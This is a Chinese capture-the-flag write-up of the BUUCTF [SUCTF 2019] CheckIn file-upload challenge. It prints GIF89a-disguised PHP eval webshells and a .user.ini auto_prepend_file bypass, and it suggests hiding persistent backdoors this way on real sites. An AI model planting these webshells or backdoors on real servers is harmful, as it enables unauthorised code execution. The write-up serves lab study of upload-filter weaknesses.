BUUCTF靶场26 -- [SUCTF 2019]CheckIn

mind

BUUCTF靶场26 -- [SUCTF 2019]CheckIn

源码：https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn

依次尝试文件后缀和修改文件内容，最后使用

[PHP] 纯文本查看 复制代码

filename="x.png"
Content-Type: image/png

GIF89a<script language="php">@eval($_POST['x'])</script>

上传一句话木马

Your dir uploads/c47b21fcf8f0bc8b3920541abd8024fd <br>Your files : <br>array(4) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(9) "index.php"
  [3]=>
  string(5) "x.png"
}


上传.htaccess无法上传成功，即使修改了Content-Type

[PHP] 纯文本查看 复制代码

<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("<? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}
Footer
© 2022 GitHub, Inc.
Footer navigation
Terms
Privacy

[PHP] 纯文本查看 复制代码

filename=".htaccess"
Content-Type: image/png

GIF89a SetHandler application/x-httpd-php

Your dir uploads/c47b21fcf8f0bc8b3920541abd8024fd <br>Your files : <br>array(4) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(9) ".htaccess"
  [3]=>
  string(9) "index.php"
}上面是失败的，再试用
上传.user.ini文件：GIF89a auto_prepend_file=pass.pnguser.ini(重点)
放一个讲的很不错的链接：.user.ini
首先介绍php.ini文件，php有很多配置，并可以在php.ini中设置。在每个正规的网站里，都会由这样一个文件，而且每次运行PHP文件时，都会去读取这个配置文件，来设置PHP的相关规则。
这些配置可以分为四种：

我感觉是按重要程度分类了，比如关乎到系统一类的配置，那一类的全部配置，都属于“PHP_INI_SYSTEM”。它只能在，像php.ini这样的“厉害”的文件里可以设定。而其他的三类不怎么重要的配置，除了可以在php.ini中设定外，还可以在其它类似的文件中设定，其中就包括.user.ini文件。


实际上，除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的。而且，和php.ini不同的是，.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载。


这里就很清楚了，.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。（上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置）

其中有两个配置，可以用来制造后门：
auto_append_file、auto_prepend_file
指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中：

auto_prepend_file=test.jpg

那么当我们访问此目录下的任何一个文件时，都会去包含test.jpg

二、实践1.制作.user.ini文件：

因为后台用exif_imagetype函数检测文件类型，所以我们在文件前加上图片的特征，来绕过检测。

2.制作图片马

此处注意，有些题会把含“<?”的文件和过滤掉，所以我们就换个方法制作图片马：注意生成的图片马的名称，要和.user.ini中的配置：auto_prepend_file的值相同。

[PHP] 纯文本查看 复制代码

<script language="php">eval($_POST['a']);</script>

让后将两个文件上传上去，然后访问index.php,我们就成功执行了木马。



然后就可以用菜刀连了。但是它会不时的清除文件，所以链接的不是很稳定，甚至有是时候连不上，但我们可以在网页执行命令。所以我第一次就是在页面执行了命令，找到了flag：
扫描根目录：a=var_dump(scandir("/"));，我们可以可以看见一个叫flag的文件
打印：a=var_dump(file_get_contents("/flag"));

在p牛的文章中提到了两个有趣的设置：auto_prepend_file和auto_append_file

我们再到手册中看了下这两个设置的定义：

大致意思就是：我们指定一个文件（如a.jpg），那么该文件就会被包含在要执行的php文件中（如index.php），类似于在index.php中插入一句：require(./a.jpg);

这两个设置的区别只是在于auto_prepend_file是在文件前插入；auto_append_file在文件最后插入（当文件调用的有exit()时该设置无效）

.user.ini实战利用的可能性

综上所述.user.ini的利用条件如下：

• 服务器脚本语言为PHP
• 服务器使用CGI／FastCGI模式
• 上传目录下要有可执行的php文件
  

从这来看.user.ini要比.htaccess的应用范围要广一些，毕竟.htaccess只能用于Apache

但仔细推敲我们就会感到“上传目录下要有可执行的php文件”这个要求在文件上传中也比较苛刻，应该没有天才开发者会把上传文件放在主目录或者把php文件放在上传文件夹。

但也不是全无办法，如果我们根据实际情况配合其他漏洞使用可能会有奇效，前段时间我遇到一个CMS对上传时的路径没有检测../，因此导致文件可被上传至任意目录，这种情况下我们就很有可能可以利用.user.ini

除此之外，把.user.ini利用在隐藏后门上应该是个很好的利用方法，我们在存在php文件的目录下留下.user.ini和我们的图片马，这样就达到了隐藏后门的目的。

refer：
    1. https://blog.csdn.net/weixin_44077544/article/details/102688564
    2. https://xz.aliyun.com/t/6091